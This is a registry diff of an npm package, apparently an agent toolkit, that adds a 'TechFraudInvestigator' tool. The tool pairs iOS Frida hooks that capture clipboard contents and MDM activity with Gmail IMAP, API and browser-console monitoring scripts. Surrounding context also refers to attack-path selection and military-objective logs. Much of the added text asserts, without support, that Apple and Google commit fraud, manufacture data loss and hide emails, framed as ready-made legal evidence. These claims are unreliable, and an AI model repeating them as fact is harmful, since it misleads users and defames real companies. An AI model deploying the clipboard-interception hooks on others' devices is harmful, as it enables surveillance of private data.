erosolar-cli 2.1.242 → 2.1.244

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (51) hide show
  1. package/dist/capabilities/iMessageVerificationCapability.d.ts +31 -0
  2. package/dist/capabilities/iMessageVerificationCapability.d.ts.map +1 -0
  3. package/dist/capabilities/iMessageVerificationCapability.js +56 -0
  4. package/dist/capabilities/iMessageVerificationCapability.js.map +1 -0
  5. package/dist/capabilities/index.d.ts +2 -0
  6. package/dist/capabilities/index.d.ts.map +1 -1
  7. package/dist/capabilities/index.js +2 -0
  8. package/dist/capabilities/index.js.map +1 -1
  9. package/dist/capabilities/unifiedInvestigationCapability.d.ts +22 -0
  10. package/dist/capabilities/unifiedInvestigationCapability.d.ts.map +1 -0
  11. package/dist/capabilities/unifiedInvestigationCapability.js +41 -0
  12. package/dist/capabilities/unifiedInvestigationCapability.js.map +1 -0
  13. package/dist/core/agentOrchestrator.d.ts +161 -1
  14. package/dist/core/agentOrchestrator.d.ts.map +1 -1
  15. package/dist/core/agentOrchestrator.js +880 -0
  16. package/dist/core/agentOrchestrator.js.map +1 -1
  17. package/dist/core/iMessageVerification.d.ts +408 -0
  18. package/dist/core/iMessageVerification.d.ts.map +1 -0
  19. package/dist/core/iMessageVerification.js +883 -0
  20. package/dist/core/iMessageVerification.js.map +1 -0
  21. package/dist/core/techFraudInvestigator.d.ts +131 -0
  22. package/dist/core/techFraudInvestigator.d.ts.map +1 -0
  23. package/dist/core/techFraudInvestigator.js +992 -0
  24. package/dist/core/techFraudInvestigator.js.map +1 -0
  25. package/dist/core/unifiedFraudOrchestrator.d.ts +542 -0
  26. package/dist/core/unifiedFraudOrchestrator.d.ts.map +1 -0
  27. package/dist/core/unifiedFraudOrchestrator.js +1449 -0
  28. package/dist/core/unifiedFraudOrchestrator.js.map +1 -0
  29. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.d.ts +3 -0
  30. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.d.ts.map +1 -0
  31. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.js +14 -0
  32. package/dist/plugins/tools/imessageVerification/iMessageVerificationPlugin.js.map +1 -0
  33. package/dist/plugins/tools/nodeDefaults.d.ts.map +1 -1
  34. package/dist/plugins/tools/nodeDefaults.js +4 -0
  35. package/dist/plugins/tools/nodeDefaults.js.map +1 -1
  36. package/dist/plugins/tools/unifiedInvestigation/unifiedInvestigationPlugin.d.ts +3 -0
  37. package/dist/plugins/tools/unifiedInvestigation/unifiedInvestigationPlugin.d.ts.map +1 -0
  38. package/dist/plugins/tools/unifiedInvestigation/unifiedInvestigationPlugin.js +14 -0
  39. package/dist/plugins/tools/unifiedInvestigation/unifiedInvestigationPlugin.js.map +1 -0
  40. package/dist/tools/iMessageVerificationTools.d.ts +17 -0
  41. package/dist/tools/iMessageVerificationTools.d.ts.map +1 -0
  42. package/dist/tools/iMessageVerificationTools.js +842 -0
  43. package/dist/tools/iMessageVerificationTools.js.map +1 -0
  44. package/dist/tools/taoTools.d.ts.map +1 -1
  45. package/dist/tools/taoTools.js +2063 -1
  46. package/dist/tools/taoTools.js.map +1 -1
  47. package/dist/tools/unifiedInvestigationTools.d.ts +19 -0
  48. package/dist/tools/unifiedInvestigationTools.d.ts.map +1 -0
  49. package/dist/tools/unifiedInvestigationTools.js +851 -0
  50. package/dist/tools/unifiedInvestigationTools.js.map +1 -0
  51. package/package.json +1 -1
package/dist/tools/taoTools.js CHANGED
@@ -14577,7 +14577,2069 @@ Use with RLOrchestrator for dual-agent optimized attack path selection.`,
14577
14577
  evidence: execute ? `Evidence logged to ${path.join(os.tmpdir(), 'russian_military_objectives.log')}` : 'Plan only'
14578
14578
  }, null, 2);
14579
14579
  }
14580
- }
14580
+ },
14581
+ // ═══════════════════════════════════════════════════════════════════════
14582
+ // TECH COMPANY FRAUD INVESTIGATION - Apple PQ3, Google Privacy
14583
+ // ═══════════════════════════════════════════════════════════════════════
14584
+ {
14585
+ name: 'TechFraudInvestigator',
14586
+ description: `Investigate tech company fraud claims - Apple PQ3/iMessage false E2E, Google privacy violations.
14587
+
14588
+ Proves that "end-to-end encryption" claims are deceptive when:
14589
+ - Server can push policies causing local code to intercept plaintext
14590
+ - OS-level code accesses data before/after encryption
14591
+ - MDM/configuration profiles enable remote control
14592
+ - Universal Clipboard routes through intermediary servers
14593
+
14594
+ Generates legal evidence for FTC complaints and litigation.`,
14595
+ parameters: {
14596
+ type: 'object',
14597
+ required: ['action'],
14598
+ properties: {
14599
+ action: {
14600
+ type: 'string',
14601
+ enum: [
14602
+ 'apple_pq3_analysis',
14603
+ 'apple_mdm_investigation',
14604
+ 'apple_clipboard_exposure',
14605
+ 'apple_backup_keys',
14606
+ 'apple_siri_plaintext',
14607
+ 'google_gmail_scanning',
14608
+ 'google_gmail_thread_manipulation',
14609
+ 'google_gmail_draft_abuse',
14610
+ 'google_chrome_telemetry',
14611
+ 'google_chrome_hijacking',
14612
+ 'google_browser_launch_abuse',
14613
+ 'google_android_tracking',
14614
+ 'google_play_services',
14615
+ 'google_unified_abuse_investigation',
14616
+ 'generate_frida_scripts',
14617
+ 'generate_mdm_profile',
14618
+ 'generate_legal_exhibit',
14619
+ 'full_apple_report',
14620
+ 'full_google_report',
14621
+ ],
14622
+ },
14623
+ target: { type: 'string', description: 'Specific target (app bundle ID, API, etc.)' },
14624
+ output_format: { type: 'string', enum: ['json', 'markdown', 'legal'], default: 'json' },
14625
+ collect_evidence: { type: 'boolean', default: false },
14626
+ },
14627
+ },
14628
+ handler: async (args) => {
14629
+ const action = args['action'];
14630
+ const outputFormat = args['output_format'] || 'json';
14631
+ const applePQ3Analysis = {
14632
+ fraud_claim: 'Apple claims iMessage uses PQ3 end-to-end encryption where only sender and recipient can read messages',
14633
+ technical_reality: {
14634
+ plaintext_access_points: [
14635
+ {
14636
+ component: 'IMDaemonCore.framework',
14637
+ access: 'Full plaintext before encryption, after decryption',
14638
+ proof: 'Hook _IMDaemonCore_encryptMessage and _IMDaemonCore_decryptMessage',
14639
+ },
14640
+ {
14641
+ component: 'SuggestionKit (Siri)',
14642
+ access: 'Message content for QuickType suggestions',
14643
+ proof: 'Monitor SGSuggestionEngine API calls',
14644
+ },
14645
+ {
14646
+ component: 'Keyboard Extensions',
14647
+ access: 'Character-by-character input before encryption',
14648
+ proof: 'Hook UIKeyInput protocol implementations',
14649
+ },
14650
+ {
14651
+ component: 'Notification System',
14652
+ access: 'Message previews in APNs',
14653
+ proof: 'Capture APNs traffic showing plaintext previews',
14654
+ },
14655
+ {
14656
+ component: 'iCloud Backup',
14657
+ access: 'Message keys in backup (Apple-accessible)',
14658
+ proof: 'Extract backup, analyze key material',
14659
+ },
14660
+ ],
14661
+ mdm_backdoor: {
14662
+ description: 'MDM profiles can trigger local code execution and policy enforcement',
14663
+ capabilities: [
14664
+ 'Managed Pasteboard - control clipboard data flow',
14665
+ 'App restrictions - control which apps can access data',
14666
+ 'Network filtering - intercept traffic before encryption',
14667
+ 'Remote wipe - prove server-triggered local execution',
14668
+ ],
14669
+ proof: 'Install MDM profile, observe policy enforcement on message handling',
14670
+ },
14671
+ universal_clipboard: {
14672
+ description: 'Copied content syncs via Apple servers (Continuity)',
14673
+ exposure_points: [
14674
+ 'UIPasteboard.general accessible to any process',
14675
+ 'Handoff data flows through iCloud',
14676
+ 'Bluetooth LE advertisements contain device info',
14677
+ ],
14678
+ proof: 'Monitor Continuity traffic during clipboard copy',
14679
+ },
14680
+ },
14681
+ legal_basis: [
14682
+ 'FTC Act Section 5 - Unfair or Deceptive Acts',
14683
+ 'California UCL - Unlawful Business Practices',
14684
+ 'Lanham Act - False Advertising',
14685
+ 'CCPA - Transparency Requirements',
14686
+ ],
14687
+ public_statements: [
14688
+ {
14689
+ source: 'Apple Security Blog',
14690
+ date: '2024-02-21',
14691
+ claim: 'iMessage now has the strongest security properties of any at-scale messaging protocol',
14692
+ contradiction: 'Encryption is meaningless when Apple code accesses plaintext',
14693
+ },
14694
+ ],
14695
+ };
14696
+ const appleMdmInvestigation = {
14697
+ mdm_capabilities: {
14698
+ configuration_profiles: {
14699
+ types: [
14700
+ 'com.apple.applicationaccess - App restrictions',
14701
+ 'com.apple.managed.configuration - General config',
14702
+ 'com.apple.restrictions - Device restrictions',
14703
+ 'com.apple.vpn.managed - VPN configuration',
14704
+ ],
14705
+ installation: 'Can be pushed silently via DEP/ABM',
14706
+ },
14707
+ managed_pasteboard: {
14708
+ settings: {
14709
+ allowOpenFromManagedToUnmanaged: 'Control data flow from managed apps',
14710
+ allowOpenFromUnmanagedToManaged: 'Control data flow to managed apps',
14711
+ forceAirDropUnmanaged: 'Control AirDrop data classification',
14712
+ },
14713
+ impact: 'Server-configured policy controls local clipboard behavior',
14714
+ },
14715
+ remote_commands: {
14716
+ available: [
14717
+ 'DeviceLock - Lock device remotely',
14718
+ 'EraseDevice - Wipe device remotely',
14719
+ 'ClearPasscode - Remove passcode remotely',
14720
+ 'InstallProfile - Push new configuration',
14721
+ 'RemoveProfile - Remove configuration',
14722
+ ],
14723
+ proof: 'These demonstrate server-triggered local execution',
14724
+ },
14725
+ },
14726
+ investigation_steps: [
14727
+ '1. Set up Apple Configurator or Jamf MDM server',
14728
+ '2. Enroll test device via DEP or manual enrollment',
14729
+ '3. Push Managed Pasteboard configuration',
14730
+ '4. Test clipboard operations with iMessage',
14731
+ '5. Document policy enforcement on message content',
14732
+ '6. Capture network traffic showing MDM commands',
14733
+ ],
14734
+ frida_hooks: {
14735
+ mdm_profile_installation: `
14736
+ // Hook MDM profile installation
14737
+ ObjC.classes.MCProfile['- installProfile:'].implementation = function(profile) {
14738
+ console.log('[MDM] Profile being installed: ' + profile);
14739
+ console.log('[EVIDENCE] ' + new Date().toISOString());
14740
+ return this.installProfile_(profile);
14741
+ };`,
14742
+ policy_enforcement: `
14743
+ // Hook managed pasteboard policy check
14744
+ Interceptor.attach(Module.findExportByName(null, 'SecTaskCopyValueForEntitlement'), {
14745
+ onEnter: function(args) {
14746
+ var entitlement = ObjC.Object(args[1]).toString();
14747
+ if (entitlement.includes('managed') || entitlement.includes('pasteboard')) {
14748
+ console.log('[POLICY] Entitlement check: ' + entitlement);
14749
+ }
14750
+ }
14751
+ });`,
14752
+ },
14753
+ };
14754
+ const appleClipboardExposure = {
14755
+ uipasteboard_analysis: {
14756
+ general_pasteboard: {
14757
+ access: 'Any app/process can read UIPasteboard.general',
14758
+ api: 'UIPasteboard.general.string, .items, .data(forPasteboardType:)',
14759
+ timing: 'Available until overwritten or device restart',
14760
+ },
14761
+ named_pasteboards: {
14762
+ access: 'App-specific pasteboards (less accessible)',
14763
+ note: 'Most apps use general pasteboard for share functionality',
14764
+ },
14765
+ ios16_changes: {
14766
+ permission_prompt: 'Apps now ask permission to read clipboard',
14767
+ limitation: 'System apps and Apple code bypass this prompt',
14768
+ proof: 'Siri suggestions read clipboard without prompt',
14769
+ },
14770
+ },
14771
+ universal_clipboard: {
14772
+ technology: 'Continuity/Handoff over Bluetooth LE + local network',
14773
+ data_flow: [
14774
+ '1. User copies on Device A',
14775
+ '2. Device A advertises via Bluetooth LE',
14776
+ '3. Device B detects advertisement',
14777
+ '4. Devices exchange data via peer-to-peer (possibly via iCloud relay)',
14778
+ '5. Content available on Device B clipboard',
14779
+ ],
14780
+ apple_involvement: {
14781
+ icloud_relay: 'Large items route through iCloud servers',
14782
+ device_discovery: 'Apple ID links devices via iCloud',
14783
+ encryption: 'Claimed E2E but Apple manages key exchange',
14784
+ },
14785
+ },
14786
+ investigation_frida_script: `
14787
+ // Monitor all UIPasteboard access
14788
+ if (ObjC.available) {
14789
+ var UIPasteboard = ObjC.classes.UIPasteboard;
14790
+
14791
+ // Hook general pasteboard access
14792
+ Interceptor.attach(UIPasteboard['+ generalPasteboard'].implementation, {
14793
+ onLeave: function(retval) {
14794
+ console.log('[CLIPBOARD] generalPasteboard accessed by: ' + ObjC.classes.NSBundle.mainBundle().bundleIdentifier());
14795
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14796
+ }
14797
+ });
14798
+
14799
+ // Hook string read
14800
+ Interceptor.attach(UIPasteboard['- string'].implementation, {
14801
+ onLeave: function(retval) {
14802
+ if (retval) {
14803
+ var content = ObjC.Object(retval).toString();
14804
+ console.log('[CLIPBOARD READ] Content length: ' + content.length);
14805
+ console.log('[CLIPBOARD READ] First 50 chars: ' + content.substring(0, 50));
14806
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14807
+ }
14808
+ }
14809
+ });
14810
+
14811
+ // Hook write
14812
+ Interceptor.attach(UIPasteboard['- setString:'].implementation, {
14813
+ onEnter: function(args) {
14814
+ var content = ObjC.Object(args[2]).toString();
14815
+ console.log('[CLIPBOARD WRITE] Content being written: ' + content.substring(0, 50));
14816
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
14817
+ }
14818
+ });
14819
+
14820
+ console.log('[*] UIPasteboard hooks installed');
14821
+ }`,
14822
+ };
14823
+ const googleGmailScanning = {
14824
+ fraud_claim: 'Google claims Gmail respects user privacy and does not scan emails for advertising',
14825
+ technical_reality: {
14826
+ content_analysis: [
14827
+ {
14828
+ feature: 'Smart Compose',
14829
+ access: 'Full email content for ML predictions',
14830
+ impact: 'Content processed by Google ML systems',
14831
+ },
14832
+ {
14833
+ feature: 'Smart Reply',
14834
+ access: 'Full email content for response suggestions',
14835
+ impact: 'Content analyzed and stored for training',
14836
+ },
14837
+ {
14838
+ feature: 'Priority Inbox',
14839
+ access: 'Content analysis for importance scoring',
14840
+ impact: 'Content patterns extracted and stored',
14841
+ },
14842
+ {
14843
+ feature: 'Spam/Phishing Detection',
14844
+ access: 'Full content scanning',
14845
+ impact: 'All email content processed by Google systems',
14846
+ },
14847
+ ],
14848
+ ad_targeting_connection: {
14849
+ description: 'While Google claims not to scan for ads, content-derived signals feed ad profile',
14850
+ mechanism: [
14851
+ 'Purchase confirmation emails → shopping interest signals',
14852
+ 'Travel emails → travel intent signals',
14853
+ 'Newsletter subscriptions → interest categories',
14854
+ 'Professional emails → job/industry signals',
14855
+ ],
14856
+ proof_method: 'Send distinctive emails, monitor ad targeting changes',
14857
+ },
14858
+ confidential_mode_theater: {
14859
+ claim: 'Confidential Mode provides enhanced privacy',
14860
+ reality: [
14861
+ 'Google still processes full message content',
14862
+ 'Expiration is client-side UI only',
14863
+ 'Google retains content regardless of "expiration"',
14864
+ '"No forwarding" is UI theater - screenshots possible',
14865
+ ],
14866
+ },
14867
+ },
14868
+ investigation_methodology: [
14869
+ '1. Create fresh Google account with no history',
14870
+ '2. Send emails with distinctive, unique keywords',
14871
+ '3. Monitor ads.google.com/adspreferences for targeting changes',
14872
+ '4. Document correlation between email content and ad targeting',
14873
+ '5. Test with Gmail API to verify content access scope',
14874
+ ],
14875
+ };
14876
+ const googleChromeTelemetry = {
14877
+ undisclosed_data_collection: {
14878
+ safe_browsing: {
14879
+ claimed: 'Hashes of URLs checked against known threats',
14880
+ reality: 'Full URLs can be reconstructed from hashes for common URLs',
14881
+ exposure: 'Browsing patterns visible to Google',
14882
+ },
14883
+ omnibox: {
14884
+ claimed: 'Suggestions from history and bookmarks',
14885
+ reality: 'Keystrokes sent to Google before search submission',
14886
+ exposure: 'Search intent visible before user commits',
14887
+ },
14888
+ chrome_variations: {
14889
+ component: 'Finch/Variations system',
14890
+ capability: 'A/B tests that change browser behavior server-side',
14891
+ exposure: 'Google controls browser features without user consent',
14892
+ },
14893
+ sync: {
14894
+ data_types: [
14895
+ 'Passwords (encrypted but Google has key escrow capability)',
14896
+ 'Bookmarks (full URL history)',
14897
+ 'Open tabs (real-time browsing activity)',
14898
+ 'Autofill (personal information)',
14899
+ 'Extensions (software inventory)',
14900
+ ],
14901
+ },
14902
+ },
14903
+ investigation_tools: {
14904
+ network_monitoring: 'mitmproxy with Chrome configured',
14905
+ source_comparison: 'Compare Chrome vs Chromium telemetry',
14906
+ extension_analysis: 'chrome://policy, chrome://sync-internals',
14907
+ },
14908
+ };
14909
+ const googleAndroidTracking = {
14910
+ location_despite_settings: {
14911
+ cell_tower: {
14912
+ collection: 'Google Carrier Services collects cell tower data',
14913
+ control: 'Not disabled by Location Services toggle',
14914
+ exposure: 'Approximate location always available to Google',
14915
+ },
14916
+ wifi_scanning: {
14917
+ collection: 'Wi-Fi networks scanned even with Wi-Fi "off"',
14918
+ setting: 'Requires separate "Wi-Fi scanning" disable',
14919
+ exposure: 'Location via Wi-Fi positioning',
14920
+ },
14921
+ bluetooth_beacons: {
14922
+ collection: 'Bluetooth beacons detected for location',
14923
+ setting: 'Requires "Bluetooth scanning" disable',
14924
+ exposure: 'Indoor positioning data',
14925
+ },
14926
+ },
14927
+ play_services_exfiltration: {
14928
+ description: 'Google Play Services runs with system privileges',
14929
+ capabilities: [
14930
+ 'Accesses data independently of app permissions',
14931
+ 'Cannot be disabled on most devices',
14932
+ 'Updates silently without user consent',
14933
+ 'Collects device identifiers, app usage, location',
14934
+ ],
14935
+ investigation: 'Monitor GMS (Google Mobile Services) traffic',
14936
+ },
14937
+ advertising_id: {
14938
+ claim: 'Users can reset Advertising ID for privacy',
14939
+ reality: [
14940
+ 'Reset creates new ID but device fingerprint persists',
14941
+ 'Google links old and new IDs via device characteristics',
14942
+ 'Cross-app tracking via Google SDKs in most apps',
14943
+ ],
14944
+ },
14945
+ };
14946
+ // Gmail Thread Manipulation Investigation
14947
+ const googleGmailThreadManipulation = {
14948
+ abuse_category: 'Gmail Thread Hiding and Manipulation',
14949
+ description: 'Google/Gmail hides, archives, moves, or manipulates email threads without user action',
14950
+ observed_behaviors: {
14951
+ thread_hiding: {
14952
+ description: 'Threads disappear from inbox without user action',
14953
+ mechanisms: [
14954
+ 'Server-side archive without IMAP command',
14955
+ 'Label manipulation (removing INBOX label)',
14956
+ 'Thread ID reassignment breaking references',
14957
+ 'Priority inbox "demotion" to hidden categories',
14958
+ ],
14959
+ evidence_collection: [
14960
+ 'IMAP sync logs showing server-side changes',
14961
+ 'Gmail API audit log via Workspace Admin',
14962
+ 'Comparison of sent Message-ID vs delivered',
14963
+ 'Thread reconstruction from mail headers',
14964
+ ],
14965
+ },
14966
+ thread_launching: {
14967
+ description: 'Threads or windows launched without user request',
14968
+ mechanisms: [
14969
+ 'Service Worker push notification triggers',
14970
+ 'Background sync API auto-opens',
14971
+ 'Chrome intent:// URL handling',
14972
+ 'mailto: protocol hijacking',
14973
+ ],
14974
+ evidence_collection: [
14975
+ 'DevTools > Application > Service Workers audit',
14976
+ 'chrome://serviceworker-internals/',
14977
+ 'Network log correlation with UI events',
14978
+ ],
14979
+ },
14980
+ message_delay: {
14981
+ description: 'Emails held by Google before delivery',
14982
+ investigation: [
14983
+ 'Compare Received headers timestamps',
14984
+ 'Calculate difference between first Received and final',
14985
+ 'Document messages held >30 seconds',
14986
+ 'Test with known-time emails from external servers',
14987
+ ],
14988
+ },
14989
+ },
14990
+ investigation_methodology: {
14991
+ imap_monitoring: {
14992
+ tools: ['imaplib (Python)', 'mbsync', 'offlineimap'],
14993
+ process: [
14994
+ '1. Enable IMAP in Gmail settings',
14995
+ '2. Set up continuous sync with local maildir',
14996
+ '3. Log all IMAP commands and responses',
14997
+ '4. Monitor for STORE commands not initiated by client',
14998
+ '5. Track UID changes and EXPUNGE events',
14999
+ ],
15000
+ script: `#!/usr/bin/env python3
15001
+ """Gmail IMAP Manipulation Monitor"""
15002
+ import imaplib
15003
+ import time
15004
+ import json
15005
+ from datetime import datetime
15006
+
15007
+ def monitor_gmail_imap(username, app_password):
15008
+ """Monitor Gmail IMAP for server-side manipulation"""
15009
+ log = []
15010
+ mail = imaplib.IMAP4_SSL('imap.gmail.com')
15011
+ mail.login(username, app_password)
15012
+ mail.select('INBOX')
15013
+
15014
+ # Get initial state
15015
+ _, data = mail.search(None, 'ALL')
15016
+ initial_uids = set(data[0].split())
15017
+
15018
+ while True:
15019
+ mail.noop() # Keep connection alive
15020
+ _, data = mail.search(None, 'ALL')
15021
+ current_uids = set(data[0].split())
15022
+
15023
+ # Detect deletions without client action
15024
+ missing = initial_uids - current_uids
15025
+ if missing:
15026
+ log.append({
15027
+ 'timestamp': datetime.now().isoformat(),
15028
+ 'event': 'SERVER_SIDE_REMOVAL',
15029
+ 'uids': list(missing),
15030
+ 'evidence': 'Messages removed without client STORE/EXPUNGE'
15031
+ })
15032
+
15033
+ # Detect new messages
15034
+ new = current_uids - initial_uids
15035
+ if new:
15036
+ for uid in new:
15037
+ _, msg_data = mail.fetch(uid, '(BODY.PEEK[HEADER])')
15038
+ log.append({
15039
+ 'timestamp': datetime.now().isoformat(),
15040
+ 'event': 'NEW_MESSAGE',
15041
+ 'uid': uid.decode(),
15042
+ 'headers': msg_data[0][1].decode()[:500]
15043
+ })
15044
+
15045
+ initial_uids = current_uids
15046
+ time.sleep(5)
15047
+
15048
+ # Save evidence
15049
+ with open('gmail_manipulation_evidence.json', 'w') as f:
15050
+ json.dump(log, f, indent=2)`,
15051
+ },
15052
+ gmail_api_audit: {
15053
+ description: 'Use Gmail API to track server-side changes',
15054
+ endpoints: [
15055
+ 'GET /gmail/v1/users/me/history - Change history',
15056
+ 'GET /gmail/v1/users/me/messages/{id} - Message metadata',
15057
+ 'GET /gmail/v1/users/me/threads/{id} - Thread structure',
15058
+ ],
15059
+ watch_for: [
15060
+ 'labelIds changes (INBOX removal)',
15061
+ 'historyId gaps indicating hidden operations',
15062
+ 'threadId reassignment',
15063
+ ],
15064
+ },
15065
+ browser_forensics: {
15066
+ description: 'Detect Gmail web manipulation',
15067
+ locations: [
15068
+ 'IndexedDB: chrome://indexeddb-internals/',
15069
+ 'Service Workers: chrome://serviceworker-internals/',
15070
+ 'Local Storage: DevTools > Application > Local Storage',
15071
+ 'Cache Storage: DevTools > Application > Cache',
15072
+ ],
15073
+ automated_detection: `// Console script to detect Gmail manipulation
15074
+ (function detectGmailManipulation() {
15075
+ const observer = new MutationObserver((mutations) => {
15076
+ mutations.forEach((m) => {
15077
+ if (m.removedNodes.length > 0) {
15078
+ m.removedNodes.forEach((node) => {
15079
+ if (node.nodeType === 1 && node.getAttribute &&
15080
+ (node.getAttribute('role') === 'listitem' ||
15081
+ node.classList?.contains('zA'))) {
15082
+ console.log('[EVIDENCE] Thread removed from DOM:', {
15083
+ timestamp: new Date().toISOString(),
15084
+ element: node.outerHTML?.substring(0, 200),
15085
+ mutation: 'REMOVAL'
15086
+ });
15087
+ }
15088
+ });
15089
+ }
15090
+ });
15091
+ });
15092
+ observer.observe(document.body, { childList: true, subtree: true });
15093
+ console.log('[*] Gmail manipulation detection active');
15094
+ })();`,
15095
+ },
15096
+ },
15097
+ legal_evidence_format: {
15098
+ exhibit_title: 'Evidence of Gmail Thread Manipulation',
15099
+ sections: [
15100
+ '1. Timeline of observed manipulation events',
15101
+ '2. IMAP logs showing server-side changes',
15102
+ '3. Gmail API history showing label changes',
15103
+ '4. Screenshots with timestamps',
15104
+ '5. Network captures (HAR files)',
15105
+ '6. Comparison of expected vs actual thread state',
15106
+ ],
15107
+ integrity_proof: 'SHA-256 hash all evidence files, notarize timestamps',
15108
+ },
15109
+ };
15110
+ // Gmail Draft Hiding/Abuse Investigation
15111
+ const googleGmailDraftAbuse = {
15112
+ abuse_category: 'Gmail Draft Manipulation and Surveillance',
15113
+ description: 'Google hides drafts, launches draft windows, or manipulates draft content',
15114
+ observed_behaviors: {
15115
+ draft_hiding: {
15116
+ description: 'Drafts disappear from Drafts folder without user deletion',
15117
+ mechanisms: [
15118
+ 'Server-side deletion/archive',
15119
+ 'Draft ID reassignment',
15120
+ 'Sync conflicts manufactured to lose content',
15121
+ 'Auto-discard based on content analysis',
15122
+ ],
15123
+ investigation: [
15124
+ 'Enable offline mode to cache local draft state',
15125
+ 'Compare local IndexedDB drafts vs server state',
15126
+ 'Monitor Gmail API drafts.list for changes',
15127
+ 'Track draft.id stability over time',
15128
+ ],
15129
+ },
15130
+ draft_launching: {
15131
+ description: 'Compose windows open without user action',
15132
+ mechanisms: [
15133
+ 'Service Worker push events',
15134
+ 'mailto: intent handling',
15135
+ 'Chrome extension API abuse',
15136
+ 'URL parameter injection (?compose=new)',
15137
+ ],
15138
+ evidence_collection: [
15139
+ 'Record screen with timestamp overlay',
15140
+ 'Monitor window.open calls in console',
15141
+ 'Track Service Worker message events',
15142
+ 'Log chrome.runtime messages',
15143
+ ],
15144
+ },
15145
+ content_modification: {
15146
+ description: 'Draft content changes without user editing',
15147
+ investigation: [
15148
+ 'Store draft content locally with timestamps',
15149
+ 'Hash comparison on each sync',
15150
+ 'Track "last edited" metadata vs actual changes',
15151
+ ],
15152
+ },
15153
+ },
15154
+ investigation_scripts: {
15155
+ draft_monitor: `#!/usr/bin/env python3
15156
+ """Gmail Draft Manipulation Monitor via API"""
15157
+ import pickle
15158
+ import os.path
15159
+ from google.auth.transport.requests import Request
15160
+ from google_auth_oauthlib.flow import InstalledAppFlow
15161
+ from googleapiclient.discovery import build
15162
+ import hashlib
15163
+ import json
15164
+ import time
15165
+ from datetime import datetime
15166
+
15167
+ SCOPES = ['https://www.googleapis.com/auth/gmail.readonly']
15168
+
15169
+ def get_gmail_service():
15170
+ creds = None
15171
+ if os.path.exists('token.pickle'):
15172
+ with open('token.pickle', 'rb') as token:
15173
+ creds = pickle.load(token)
15174
+ if not creds or not creds.valid:
15175
+ if creds and creds.expired and creds.refresh_token:
15176
+ creds.refresh(Request())
15177
+ else:
15178
+ flow = InstalledAppFlow.from_client_secrets_file('credentials.json', SCOPES)
15179
+ creds = flow.run_local_server(port=0)
15180
+ with open('token.pickle', 'wb') as token:
15181
+ pickle.dump(creds, token)
15182
+ return build('gmail', 'v1', credentials=creds)
15183
+
15184
+ def monitor_drafts():
15185
+ service = get_gmail_service()
15186
+ evidence = []
15187
+ known_drafts = {}
15188
+
15189
+ while True:
15190
+ results = service.users().drafts().list(userId='me').execute()
15191
+ drafts = results.get('drafts', [])
15192
+
15193
+ current_ids = {d['id'] for d in drafts}
15194
+ known_ids = set(known_drafts.keys())
15195
+
15196
+ # Detect disappeared drafts
15197
+ missing = known_ids - current_ids
15198
+ for draft_id in missing:
15199
+ evidence.append({
15200
+ 'timestamp': datetime.now().isoformat(),
15201
+ 'event': 'DRAFT_DISAPPEARED',
15202
+ 'draft_id': draft_id,
15203
+ 'last_known_content_hash': known_drafts[draft_id]['hash'],
15204
+ 'evidence': 'Draft removed without user action'
15205
+ })
15206
+
15207
+ # Update known drafts and detect content changes
15208
+ for draft in drafts:
15209
+ draft_id = draft['id']
15210
+ full_draft = service.users().drafts().get(userId='me', id=draft_id).execute()
15211
+ content = json.dumps(full_draft['message'], sort_keys=True)
15212
+ content_hash = hashlib.sha256(content.encode()).hexdigest()
15213
+
15214
+ if draft_id in known_drafts:
15215
+ if known_drafts[draft_id]['hash'] != content_hash:
15216
+ evidence.append({
15217
+ 'timestamp': datetime.now().isoformat(),
15218
+ 'event': 'DRAFT_CONTENT_CHANGED',
15219
+ 'draft_id': draft_id,
15220
+ 'old_hash': known_drafts[draft_id]['hash'],
15221
+ 'new_hash': content_hash,
15222
+ 'evidence': 'Draft content modified without user edit'
15223
+ })
15224
+
15225
+ known_drafts[draft_id] = {'hash': content_hash, 'seen': datetime.now().isoformat()}
15226
+
15227
+ with open('gmail_draft_evidence.json', 'w') as f:
15228
+ json.dump(evidence, f, indent=2)
15229
+
15230
+ time.sleep(10)`,
15231
+ browser_draft_monitor: `// Console script to monitor Gmail draft manipulation
15232
+ (function monitorGmailDrafts() {
15233
+ let knownDrafts = new Map();
15234
+
15235
+ // Monitor compose window creation
15236
+ const originalOpen = window.open;
15237
+ window.open = function(...args) {
15238
+ console.log('[EVIDENCE] window.open called:', {
15239
+ timestamp: new Date().toISOString(),
15240
+ args: args,
15241
+ stack: new Error().stack
15242
+ });
15243
+ return originalOpen.apply(this, args);
15244
+ };
15245
+
15246
+ // Monitor IndexedDB draft operations
15247
+ const originalIDBOpen = indexedDB.open;
15248
+ indexedDB.open = function(name, ...args) {
15249
+ const request = originalIDBOpen.call(this, name, ...args);
15250
+ if (name.includes('mail') || name.includes('draft')) {
15251
+ request.onsuccess = function(e) {
15252
+ console.log('[EVIDENCE] IndexedDB opened:', name);
15253
+ };
15254
+ }
15255
+ return request;
15256
+ };
15257
+
15258
+ // Monitor for compose DOM elements appearing
15259
+ const observer = new MutationObserver((mutations) => {
15260
+ mutations.forEach((m) => {
15261
+ m.addedNodes.forEach((node) => {
15262
+ if (node.nodeType === 1) {
15263
+ if (node.querySelector?.('[role="dialog"]') ||
15264
+ node.classList?.contains('AD') ||
15265
+ node.getAttribute?.('role') === 'dialog') {
15266
+ console.log('[EVIDENCE] Compose dialog appeared:', {
15267
+ timestamp: new Date().toISOString(),
15268
+ triggered_by: 'DOM_MUTATION',
15269
+ element: node.outerHTML?.substring(0, 300)
15270
+ });
15271
+ }
15272
+ }
15273
+ });
15274
+ });
15275
+ });
15276
+ observer.observe(document.body, { childList: true, subtree: true });
15277
+
15278
+ console.log('[*] Gmail draft manipulation monitoring active');
15279
+ })();`,
15280
+ },
15281
+ legal_evidence_format: {
15282
+ exhibit_title: 'Evidence of Gmail Draft Manipulation',
15283
+ sections: [
15284
+ '1. Draft disappearance timeline with API logs',
15285
+ '2. Content hash comparisons showing server-side changes',
15286
+ '3. Screenshots of unexpected compose windows',
15287
+ '4. Service Worker event logs',
15288
+ '5. IndexedDB state comparison',
15289
+ ],
15290
+ },
15291
+ };
15292
+ // Chrome Browser Hijacking Investigation
15293
+ const googleChromeHijacking = {
15294
